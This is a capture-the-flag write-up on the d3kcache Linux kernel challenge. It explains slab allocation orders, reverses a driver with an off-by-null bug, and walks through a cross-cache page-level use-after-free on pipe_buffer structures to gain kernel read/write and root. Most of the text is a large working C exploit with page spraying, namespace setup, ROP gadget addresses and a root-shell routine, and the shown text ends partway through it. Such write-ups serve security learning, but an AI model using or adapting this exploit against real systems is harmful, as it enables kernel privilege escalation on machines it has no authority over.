Note that right at the top it calls kcalloc, whose first argument is exactly what fcntl lets us control. If nr_slots is 64, the request is 64 * 40 = 0xa00 bytes, served from kmalloc-cg-4k — whose slabs are order 3, greatly improving the success rate.
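A minimal sketch of the resize (this is exactly what the exploit at the end does): F_SETPIPE_SZ takes a size in bytes, round_pipe_size rounds it to pages, and nr_slots = size >> PAGE_SHIFT, so asking for 64 pages yields 64 slots:

#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

int make_order3_pipe(int pfd[2])
{
    if (pipe(pfd) < 0)
        return -1;

    /* 0x1000 * 64 -> nr_slots = 64 -> kcalloc(64, 40) = 0xa00 bytes,
     * served from kmalloc-cg-4k, whose slabs are order 3 */
    if (fcntl(pfd[1], F_SETPIPE_SZ, 0x1000 * 64) < 0)
        return -1;

    return 0;
}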

static inline int calculate_order(unsigned int size)
{
unsigned int order;
unsigned int min_objects;
unsigned int max_objects;
unsigned int nr_cpus;

/*
* Attempt to find best configuration for a slab. This
* works by first attempting to generate a layout with
* the best configuration and backing off gradually.
*
* First we increase the acceptable waste in a slab. Then
* we reduce the minimum objects required in a slab.
*/
min_objects = slub_min_objects;
if (!min_objects) {
/*
* Some architectures will only update present cpus when
* onlining them, so don't trust the number if it's just 1. But
* we also don't want to use nr_cpu_ids always, as on some other
* architectures, there can be many possible cpus, but never
* onlined. Here we compromise between trying to avoid too high
* order on systems that appear larger than they are, and too
* low order on systems that appear smaller than they are.
*/
nr_cpus = num_present_cpus();
if (nr_cpus <= 1)
nr_cpus = nr_cpu_ids;
min_objects = 4 * (fls(nr_cpus) + 1);
}
max_objects = order_objects(slub_max_order, size);
min_objects = min(min_objects, max_objects);

... ...
}

You may wonder why kmalloc-4k has order 3. Look at calculate_order again: the last step of initializing min_objects takes the minimum of min_objects and max_objects.

static inline unsigned int order_objects(unsigned int order, unsigned int size)
{
    return ((unsigned int)PAGE_SIZE << order) / size;
}

This is order_objects. slub_max_order is 3, so for size 4k (0x1000) we get max_objects = (0x1000 << 3) / 0x1000 = 8; min_objects therefore drops from 16 to 8, and the search that follows — starting at get_order(8 * 0x1000) — settles on order 3.

d3kcache

After all that groundwork we finally arrive at the challenge — and even with all of the theory above in hand, it's still no easy ride.

Besides the usual mitigations, the kernel is built with a pile of hardening options:

CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH=""
CONFIG_SLUB=y
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_HARDENED_USERCOPY=y

All of the above are enabled, and on top of them, Control Flow Integrity:

CONFIG_CFI_CLANG=y

This protection validates whether an ops pointer is legitimate, and the check is strict: the ops value is checked (XORed) against a fixed constant, and any non-zero result immediately triggers a kernel panic. Not knowing this at the time is exactly why I burned half a day trying to hijack pipe_buffer's ops pointer.
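To get an intuition for why a sprayed fake ops table dies instantly, here is a toy user-space model of such a check (purely illustrative, not the actual codegen — real clang kCFI stores a type hash near the function entry and the compiler emits the comparison before every indirect call):

#include <stdio.h>
#include <stdlib.h>

/* toy model: each function pointer carries an expected type hash which
 * the caller verifies before any indirect call */
struct ops { unsigned int hash; void (*release)(void); };

#define RELEASE_HASH 0x196082u   /* hypothetical hash value */

static void real_release(void) { puts("ok: hash matched"); }

static void cfi_call(const struct ops *o)
{
    if (o->hash != RELEASE_HASH) {   /* mismatch -> kernel panic */
        puts("CFI failure: panic()");
        exit(1);
    }
    o->release();
}

int main(void)
{
    struct ops good = { RELEASE_HASH, real_release };
    struct ops evil = { 0xdeadbeef, real_release };  /* fake ops table */

    cfi_call(&good);
    cfi_call(&evil);
    return 0;
}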

Driver analysis

__int64 init_module()
{
unsigned int v0; // ebx

printk(&unk_96B);
major_num = _register_chrdev(0LL, 0LL, 256LL, "d3kcache", &d3kcache_fo);
if ( major_num >= 0 )
{
module_class = _class_create(&_this_module, "d3kcache", &d3kcache_module_init___key);
if ( (unsigned __int64)module_class < 0xFFFFFFFFFFFFF001LL )
{
printk(&unk_A0D);
v0 = 0;
module_device = device_create(module_class, 0LL, (unsigned int)(major_num << 20), 0LL, "d3kcache");
if ( (unsigned __int64)module_device < 0xFFFFFFFFFFFFF001LL )
{
printk(&unk_A66);
spin = 0;
kcache_jar = kmem_cache_create_usercopy("kcache_jar", 0x800LL, 0LL, 67379200LL, 0LL, 2048LL, 0LL);
memset(kcache_list, 0, 0x100uLL);
}
else
{
class_destroy(module_class);
_unregister_chrdev((unsigned int)major_num, 0LL, 256LL, "d3kcache");
printk(&unk_A3B);
return (unsigned int)module_device;
}
}
else
{
_unregister_chrdev((unsigned int)major_num, 0LL, 256LL, "d3kcache");
printk(&unk_9DE);
return (unsigned int)module_class;
}
}
else
{
printk(&unk_9AD);
return (unsigned int)major_num;
}
return v0;
}

First, module init: it calls the kmem_cache_create_usercopy function discussed earlier, with size specified as 0x800. Per the analysis above, the resulting cache's slab order is 3.

__int64 __fastcall d3kcache_ioctl(__int64 a1, int a2, __int64 a3)
{
__int64 v4; // rax
__int64 v5; // rbx
int v7; // ecx
__int64 v8; // r14
__int64 v9; // r15
__int64 v10; // r12
int v11; // ecx
__int64 v12; // rbx
__int64 v13; // r14
__int64 v14; // r15
__int64 v15; // rax
__int64 v16; // r15
unsigned int v17; // r13d
__int64 v18; // r14
__int64 v19; // r12
__int64 v20; // r14
unsigned __int64 v21; // rbx
__int64 v22; // rax
__int64 v23; // r12
unsigned __int64 v24; // rbx
void *v25; // rdi
unsigned int v26; // [rsp-48h] [rbp-48h] BYREF
unsigned int v27; // [rsp-44h] [rbp-44h]
__int64 v28; // [rsp-40h] [rbp-40h]
unsigned __int64 v29; // [rsp-38h] [rbp-38h]

v29 = __readgsqword(0x28u);
raw_spin_lock(&spin);
v4 = copy_from_user(&v26, a3, 16LL);
v5 = -1LL;
if ( v4 )
goto LABEL_2;
if ( a2 > 0x80F )
{
if ( a2 == 0x810 )
{
if ( v26 > 0xFuLL || !qword_17D8[2 * v26] )
{
v25 = &unk_882;
goto LABEL_46;
}
kmem_cache_free(kcache_jar);
v20 = (int)v26;
if ( (unsigned __int64)(int)v26 > 0xF )
{
_ubsan_handle_out_of_bounds(&off_12A0, v26);
v21 = (int)v26;
qword_17D8[2 * v20] = 0LL;
if ( v21 >= 0x10 )
_ubsan_handle_out_of_bounds(&off_12C0, (unsigned int)v21);
}
else
{
qword_17D8[2 * (int)v26] = 0LL;
v21 = (unsigned int)v20;
}
kcache_list[4 * v21] = 0;
v5 = 0LL;
}
else
{
if ( a2 != 6425 )
goto LABEL_42;
if ( v26 > 0xFuLL || !qword_17D8[2 * v26] )
{
v25 = &unk_85D;
goto LABEL_46;
}
v11 = v27;
if ( v27 > kcache_list[4 * v26] )
v11 = kcache_list[4 * v26];
if ( v11 < 0 )
BUG();
v12 = (unsigned int)v11;
v13 = qword_17D8[2 * v26];
v14 = v28;
_check_object_size(v13, (unsigned int)v11, 1LL);
v5 = -(__int64)(copy_to_user(v14, v13, v12) != 0);
}
}
else
{
if ( a2 != 0x114 )
{
if ( a2 == 0x514 )
{
if ( v26 <= 0xFuLL && qword_17D8[2 * v26] )
{
v7 = v27;
if ( v27 > 0x800 || v27 + kcache_list[4 * v26] >= 0x800 )
v7 = 2048 - kcache_list[4 * v26];
if ( v7 < 0 )
BUG();
v8 = qword_17D8[2 * v26] + (unsigned int)kcache_list[4 * v26];
v9 = (unsigned int)v7;
v10 = v28;
_check_object_size(v8, (unsigned int)v7, 0LL);
if ( !copy_from_user(v8, v10, v9) )
{
*(_BYTE *)(v8 + v9) = 0;
v5 = 0LL;
}
goto LABEL_2;
}
v25 = &unk_837;
LABEL_46:
printk(v25);
goto LABEL_2;
}
LABEL_42:
v25 = &unk_8AA;
goto LABEL_46;
}
if ( v26 >= 0x10uLL )
{
v25 = &unk_782;
goto LABEL_46;
}
if ( qword_17D8[2 * v26] )
{
v25 = &unk_7F6;
goto LABEL_46;
}
v15 = kmem_cache_alloc(kcache_jar, 0xDC0LL);
if ( !v15 )
{
v25 = &unk_81A;
goto LABEL_46;
}
v16 = v15;
v17 = v27;
v18 = 2048LL;
if ( v27 < 0x800 )
v18 = v27;
v19 = v28;
_check_object_size(v15, v18, 0LL);
if ( copy_from_user(v16, v19, v18) )
{
kmem_cache_free(kcache_jar);
}
else
{
v22 = 0x7FFLL;
if ( v17 < 0x7FF )
v22 = v17;
*(_BYTE *)(v16 + v22) = 0;
v23 = (int)v26;
if ( (unsigned __int64)(int)v26 > 0xF )
{
_ubsan_handle_out_of_bounds(&off_1260, v26);
v24 = (int)v26;
qword_17D8[2 * v23] = v16;
if ( v24 >= 0x10 )
_ubsan_handle_out_of_bounds(&off_1280, (unsigned int)v24);
}
else
{
qword_17D8[2 * (int)v26] = v16;
v24 = (unsigned int)v23;
}
kcache_list[4 * v24] = v18;
v5 = 0LL;
}
}
LABEL_2:
raw_spin_unlock(&spin);
return v5;
}

Then the ioctl handler. Reversing it shows four branches — add, delete, edit and show — and the bug sits in add and edit: a blatant off-by-null. There are no other bugs.

Intended exploitation analysis

With everything above, we can now get the vuln slab page adjacent to the victim slab page; further analysis shows these two pages are, respectively, the challenge's own slab page and the slab page holding pipe_buffers. The answer practically writes itself: with the challenge's off-by-null we can bend a pipe_buffer->page pointer onto the page another pipe_buffer points to, and once we control one of those pipe_buffers and free its page, we have a page-level UAF. However, since struct page is only 0x40 bytes, the success rate is 1/4 — when the page pointer already ends in 0x00, the off-by-null cannot change where it points.

image-20230519171327450

image-20230519171353853

Now that we have a page-level UAF, what happens if we allocate pipe_buffers on top of the freed page?

image-20230519173248182

The result is the structure shown above. Through the leftmost pipe_buffer we can now read the contents of the new pipe_buffer its page points at — and since we can write as well as read, we can make the two rightmost pipe_buffers' page pointers point at the same page again, producing the situation below:

image-20230519173704454

Following that idea, we can free the rightmost page and create a page-level UAF a second time — only this time, thanks to the first leak, we know the rightmost page's address. Here's the fun part: after creating this second UAF, we again place pipe_buffers on the rightmost page and make the page pointer of a pipe_buffer inside it point at that page itself, giving us:

image-20230519174027597

Because this is a page-level UAF, the middle pipe can also rewrite the other pipe_buffers below it, so on the rightmost page we control three pipe_buffers in total. Their roles:

  1. Pipe one performs arbitrary read/write across kernel memory through its page pointer
  2. Pipe two rewrites pipe three, re-pointing pipe three at pipe one
  3. Pipe three rewrites pipes one and two: it sets pipe one's page to the target location and re-points pipe two back at pipe three

With the three pipes rewriting each other in a cycle, we get essentially unrestricted arbitrary read/write over the entire kernel address space.

With unrestricted arbitrary read/write, privilege escalation can be done any number of ways. One thing to note up front: pipe_buffer's page pointer must always point at a struct page, and all struct pages live in the kernel's vmemmap region, so the first order of business is locating vmemmap.
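Because struct page is 0x40 bytes here and vmemmap is a flat array indexed by page frame number, translating a direct-mapping address into its struct page address is pure arithmetic. This is the direct_map_addr_to_page_addr() helper from the exploit below:

#include <stddef.h>
#include <stdint.h>

uint64_t page_offset_base;  /* base of the direct mapping (leaked later) */
uint64_t vmemmap_base;      /* base of the struct page array             */

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
    /* page frame index relative to the start of the direct mapping */
    size_t page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

    /* sizeof(struct page) == 0x40 */
    return vmemmap_base + page_count * 0x40;
}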

Method one: overwrite the cred pointer in our task_struct with the address of init_cred.

Method two: write a ROP chain onto the kernel stack. First leak the stack address: task_struct has a stack member which, as the name suggests, holds the stack's address — a virtual one. To write into the stack we need the struct page backing its physical memory, and the page tables give us that: task_struct->mm points to an mm_struct whose pgd member is the page table root. Walking the tables translates the stack's virtual address into a physical one, hence into its struct page, and then we write the prepared ROP chain into the stack.

Method three: USMA, the user-space mapping attack — patching the kernel code segment. Writing through the direct mapping would panic for lack of write permission; but patching kernel code really just means writing to the physical pages behind it, and since we can read and write the page tables, we can build a user-space mapping onto the kernel text's physical memory and patch the code from there.
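A heavily hedged sketch of the USMA idea (not part of this exploit's final code; it assumes the pipe read/write primitives and the page-table walk from method two; the flag values are the standard x86-64 low PTE bits):

#include <stddef.h>
#include <stdint.h>

struct page;
extern void arbitrary_read_by_pipe(struct page *page_to_read, void *dst);
extern void arbitrary_write_by_pipe(struct page *page_to_write, void *src,
                                    size_t len);

#define PTE_PRESENT (1UL << 0)
#define PTE_RW      (1UL << 1)
#define PTE_USER    (1UL << 2)

/* point one of our user pages' PTEs at the kernel text frame; afterwards
 * writing through that user VA patches kernel code directly */
void usma_map_kernel_text(uint64_t pte_page,   /* struct page of the PTE table   */
                          int pte_idx,         /* index of our user page's entry */
                          uint64_t ktext_phys, /* phys addr of kernel text       */
                          uint64_t *pte_buf)   /* 0x1000-byte scratch buffer     */
{
    arbitrary_read_by_pipe((struct page *)pte_page, pte_buf);

    /* replace our PTE: present + writable + user, backed by kernel text */
    pte_buf[pte_idx] = (ktext_phys & ~0xfffUL)
                     | PTE_PRESENT | PTE_RW | PTE_USER;

    arbitrary_write_by_pipe((struct page *)pte_page, pte_buf, 0xff0);
}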

Putting it all together, the exploit:

#define _GNU_SOURCE
#include <err.h>
#include <inttypes.h>
#include <sched.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <stdint.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <stdio.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <time.h>

#define PGV_PAGE_NUM 1000
#define PGV_1PAGE_SPRAY_NUM 0x20
#define PGV_4PAGES_SPRAY_NUM 0x40
#define PGV_4PAGES_START_IDX 0x20
#define PGV_8PAGES_SPRAY_NUM 0x40
#define PGV_8PAGES_START_IDX 0x60
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

#define PIPE_SPRAY_NUM 200
#define SND_PIPE_BUF_SZ 96
#define TRD_PIPE_BUF_SZ 192

void errExit(char *err_msg)
{
puts(err_msg);
exit(-1);
}

size_t user_cs, user_ss, user_sp, user_rflags;
void save_status()
{
__asm__(
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;");
puts("[*]status has been saved.");
}

void get_shell()
{
if (getuid())
{
printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n");
exit(-1);
}
printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n");
system("/bin/sh");
}

unsigned long kernel_addr;
unsigned long kernel_base;
unsigned long kernel_offset;
int fd;

struct option
{
unsigned int idx;
unsigned int size;
char *buf;
};

void create(unsigned int idx, unsigned int size, char *buf)
{
struct option *option = malloc(sizeof(struct option));
option->idx = idx;
option->size = size;
option->buf = buf;
ioctl(fd, 0x114, option);
}

void delete(unsigned int idx)
{
struct option *option = malloc(sizeof(struct option));
option->idx = idx;
ioctl(fd, 0x810, option);
}

void show(unsigned int idx, unsigned int size, char *buf)
{
struct option *option = malloc(sizeof(struct option));
option->idx = idx;
option->size = size;
option->buf = buf;
ioctl(fd, 0x1919, option);
}

void edit(unsigned int idx, unsigned int size, char *buf)
{
struct option *option = malloc(sizeof(struct option));
option->idx = idx;
option->size = size;
option->buf = buf;
ioctl(fd, 0x514, option);
}

struct pgv_page_request
{
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};

enum tpacket_versions
{
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

struct tpacket_req
{
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
};

int cmd_pipe_req[2], cmd_pipe_reply[2];

int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
struct tpacket_req req;
int socket_fd, version;
int ret;

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0)
{
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
return ret;
}

version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0)
{
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
close(socket_fd);
return ret;
}

memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0)
{
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
close(socket_fd);
return ret;
}

return socket_fd;
}

int alloc_page(int idx, unsigned int size, unsigned int nr)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = 0,
.size = size,
.nr = nr,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

return ret;
}

int free_page(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = 1,
};
int ret;

write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));

usleep(10000);

return ret;
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

struct pipe_buffer
{
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

int pipe_fd[PIPE_SPRAY_NUM][2];
struct pipe_buffer evil_2nd_buf, evil_3rd_buf, evil_4th_buf;
int self_4th_pipe_pid = -1;
int self_2nd_pipe_pid = -1;
int self_3rd_pipe_pid = -1;
char temp_zero_buf[0x1000] = {'\0'};

void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_fd[self_4th_pipe_pid][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

read(pipe_fd[self_2nd_pipe_pid][0], dst, 0xfff);
}

void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

write(pipe_fd[self_3rd_pipe_pid][1], &evil_4th_buf, sizeof(evil_4th_buf));

write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_fd[self_4th_pipe_pid][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

write(pipe_fd[self_2nd_pipe_pid][1], src, len);
}

uint64_t page_offset_base;
uint64_t vmemmap_base;

size_t direct_map_addr_to_page_addr(size_t direct_map_addr)
{
size_t page_count;

page_count = ((direct_map_addr & (~0xfff)) - page_offset_base) / 0x1000;

return vmemmap_base + page_count * 0x40;
}

#define COMMIT_CREDS 0xffffffff811284e0
#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0xffffffff82201a90
#define INIT_CRED 0xffffffff83079ee8
#define POP_RDI_RET 0xffffffff810157a9
#define RET 0xffffffff810157aa

#define PTE_OFFSET 12
#define PMD_OFFSET 21
#define PUD_OFFSET 30
#define PGD_OFFSET 39

#define PT_ENTRY_MASK 0b111111111UL
#define PTE_MASK (PT_ENTRY_MASK << PTE_OFFSET)
#define PMD_MASK (PT_ENTRY_MASK << PMD_OFFSET)
#define PUD_MASK (PT_ENTRY_MASK << PUD_OFFSET)
#define PGD_MASK (PT_ENTRY_MASK << PGD_OFFSET)

#define PTE_ENTRY(addr) ((addr >> PTE_OFFSET) & PT_ENTRY_MASK)
#define PMD_ENTRY(addr) ((addr >> PMD_OFFSET) & PT_ENTRY_MASK)
#define PUD_ENTRY(addr) ((addr >> PUD_OFFSET) & PT_ENTRY_MASK)
#define PGD_ENTRY(addr) ((addr >> PGD_OFFSET) & PT_ENTRY_MASK)

// #define PAGE_ATTR_RW (1UL << 1)
#define PAGE_ATTR_NX (1UL << 63)

#define NS_CAPABLE_SETID 0xffffffff810fd2a0

int main()
{
save_status();

char *buf = malloc(0x2000);
char target[16];
size_t target_addr;

strcpy(target, "trytofind196082");
if (prctl(PR_SET_NAME, target, 0, 0, 0) != 0)
{
errExit("cannot set name");
}

fd = open("/dev/d3kcache", O_RDWR);
if (fd == -1)
{
errExit("[-] faild open d3kcache!");
}

pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);

if (!fork())
{
struct pgv_page_request req;
int socket_fd[PGV_PAGE_NUM];
int ret;

char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

while (1)
{
read(cmd_pipe_req[0], &req, sizeof(req));
if (req.cmd == 0)
{
ret = create_socket_and_alloc_pages(req.size, req.nr);
socket_fd[req.idx] = ret;
}
else if (req.cmd == 1)
{
ret = close(socket_fd[req.idx]);
}
else if (req.cmd == 2)
{
exit(0);
}
write(cmd_pipe_reply[1], &ret, sizeof(ret));
}
}
int pgv_1page_start_idx = 0;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;
{

puts("[*] spray pgv order-0 pages...");
for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++)
{
if (alloc_page(i, 0x1000, 1) < 0)
{
printf("[x] failed to create %d socket for pages spraying!\n", i);
errExit("Faild to spray pgv!");
}
}

puts("[*] spray pgv order-2 pages...");
for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++)
{
if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0)
{
printf("[x] failed to create %d socket for pages spraying!\n", i);
errExit("Faild to spray pgv!");
}
}

puts("[*] spray pgv order-3 pages...");
for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++)
{
if (i % 19 == 0)
{
free_page(pgv_4pages_start_idx++);
}

if (i % 21 == 0)
{
free_page(pgv_1page_start_idx += 2);
}

if (i % 512 == 0)
{
free_page(pgv_1page_start_idx += 2);
}

if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0)
{
printf("[x] failed to create %d socket for pages spraying!\n", i);
errExit("Faild to spray pgv!");
}
}
}

int victim_pid = -1;
int orig_pid = -1;

{
puts("[*] spray pipe_buffer...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{

if (pipe(pipe_fd[i]) < 0)
{
printf("[x] failed to alloc %d pipe!", i);
errExit("FAILED to create pipe!");
}
}
puts("[*] exetend pipe_buffer...");
for (int i = 0; i < (PIPE_SPRAY_NUM / 2); i++)
{
if (i % 8 == 0)
{
free_page(pgv_8pages_start_idx++);
}

if (fcntl(pipe_fd[0 + i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0)
{
printf("[x] failed to extend %d pipe!\n", 0 + i);
errExit("FAILED to extend pipe!");
}
}
puts("[*] spray vulnerable 2k obj...");
free_page(pgv_8pages_start_idx++);
for (int i = 0; i < 0x10; i++)
{
create(i, 8, "0x196082");
}
puts("[*] exetend pipe_buffer...");
for (int i = 0; i < (PIPE_SPRAY_NUM / 2); i++)
{
if (i % 8 == 0)
{
free_page(pgv_8pages_start_idx++);
}

if (fcntl(pipe_fd[(PIPE_SPRAY_NUM / 2) + i][1], F_SETPIPE_SZ, 0x1000 * 64) < 0)
{
printf("[x] failed to extend %d pipe!\n", (PIPE_SPRAY_NUM / 2) + i);
errExit("FAILED to extend pipe!");
}
}
puts("[*] allocating pipe pages...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
write(pipe_fd[i][1], "0x196082", 8);
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], &i, sizeof(int));
write(pipe_fd[i][1], "0x196082", 8);
write(pipe_fd[i][1], "0x196082", 8);
}

puts("[*] trigerring cross-cache off-by-null...");
show(0, 0, buf);
memset(buf, 0x61, 0x800);
for (int i = 0; i < 0x10; i++)
{
edit(i, 0x7f8, buf);
}
show(0, 0, buf);
puts("[*] checking for corruption...");

for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
char str_flag[0x10];
int nr;

memset(str_flag, '\0', sizeof(str_flag));
read(pipe_fd[i][0], str_flag, 8);
read(pipe_fd[i][0], &nr, sizeof(int));
if (!strcmp(str_flag, "0x196082") && nr != i)
{
orig_pid = nr;
victim_pid = i;
printf("\033[32m\033[1m[+] Found victim: \033[0m%d "
"\033[32m\033[1m, orig: \033[0m%d\n\n",
victim_pid, orig_pid);
break;
}
}
if (victim_pid == -1)
{
errExit("FAILED to corrupt pipe_buffer!");
}
}

int snd_orig_pid = -1;
int snd_vicitm_pid = -1;
struct pipe_buffer info_pipe_buf;

{
size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));

memset(buf, '\0', sizeof(buf));

write(pipe_fd[victim_pid][1], buf, SND_PIPE_BUF_SZ * 2 - 24 - 3 * sizeof(int));

puts("[*] free original pipe...");
close(pipe_fd[orig_pid][0]);
close(pipe_fd[orig_pid][1]);

puts("[*] fcntl() to set the pipe_buffer on victim page...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
if (i == orig_pid || i == victim_pid)
{
continue;
}

if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0)
{
printf("[x] failed to resize %d pipe!\n", i);
errExit("FAILED to re-alloc pipe_buffer!");
}
}

read(pipe_fd[victim_pid][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
read(pipe_fd[victim_pid][0], &info_pipe_buf, sizeof(info_pipe_buf));

printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
"\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
info_pipe_buf.page, info_pipe_buf.ops);

if ((size_t)info_pipe_buf.page < 0xffff000000000000 || (size_t)info_pipe_buf.ops < 0xffffffff81000000)
{
errExit("FAILED to re-hit victim page!");
}

puts("\033[32m\033[1m[+] Successfully to hit the UAF page!\033[0m");
printf("\033[32m\033[1m[+] Got page leak:\033[0m %p\n", info_pipe_buf.page);
puts("");

puts("[*] construct a second-level uaf pipe page...");
info_pipe_buf.page = (struct page *)((size_t)info_pipe_buf.page + 0x40);
write(pipe_fd[victim_pid][1], &info_pipe_buf, sizeof(info_pipe_buf));

for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
int nr;

if (i == orig_pid || i == victim_pid)
{
continue;
}

read(pipe_fd[i][0], &nr, sizeof(nr));
if (nr < PIPE_SPRAY_NUM && i != nr)
{
snd_orig_pid = nr;
snd_vicitm_pid = i;
printf("\033[32m\033[1m[+] Found second-level victim: \033[0m%d "
"\033[32m\033[1m, orig: \033[0m%d\n",
snd_vicitm_pid, snd_orig_pid);
break;
}
}

if (snd_vicitm_pid == -1)
{
errExit("FAILED to corrupt second-level pipe_buffer!");
}
}

{
size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
struct pipe_buffer evil_pipe_buf;
struct page *page_ptr;

memset(buf, 0, sizeof(buf));

write(pipe_fd[snd_vicitm_pid][1], buf, TRD_PIPE_BUF_SZ - 24 - 3 * sizeof(int));

puts("[*] free second-level original pipe...");
close(pipe_fd[snd_orig_pid][0]);
close(pipe_fd[snd_orig_pid][1]);

puts("[*] fcntl() to set the pipe_buffer on second-level victim page...");
for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
if (i == orig_pid || i == victim_pid || i == snd_orig_pid || i == snd_vicitm_pid)
{
continue;
}

if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0)
{
printf("[x] failed to resize %d pipe!\n", i);
errExit("FAILED to re-alloc pipe_buffer!");
}
}

puts("[*] hijacking the 2nd pipe_buffer on page to itself...");
evil_pipe_buf.page = info_pipe_buf.page;
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
evil_pipe_buf.ops = info_pipe_buf.ops;
evil_pipe_buf.flags = info_pipe_buf.flags;
evil_pipe_buf.private = info_pipe_buf.private;

write(pipe_fd[snd_vicitm_pid][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

for (int i = 0; i < PIPE_SPRAY_NUM; i++)
{
if (i == orig_pid || i == victim_pid || i == snd_orig_pid || i == snd_vicitm_pid)
{
continue;
}

read(pipe_fd[i][0], &page_ptr, sizeof(page_ptr));
if (page_ptr == evil_pipe_buf.page)
{
self_2nd_pipe_pid = i;
printf("\033[32m\033[1m[+] Found self-writing pipe: \033[0m%d\n",
self_2nd_pipe_pid);
break;
}
}

if (self_2nd_pipe_pid == -1)
{
errExit("FAILED to build a self-writing pipe!");
}

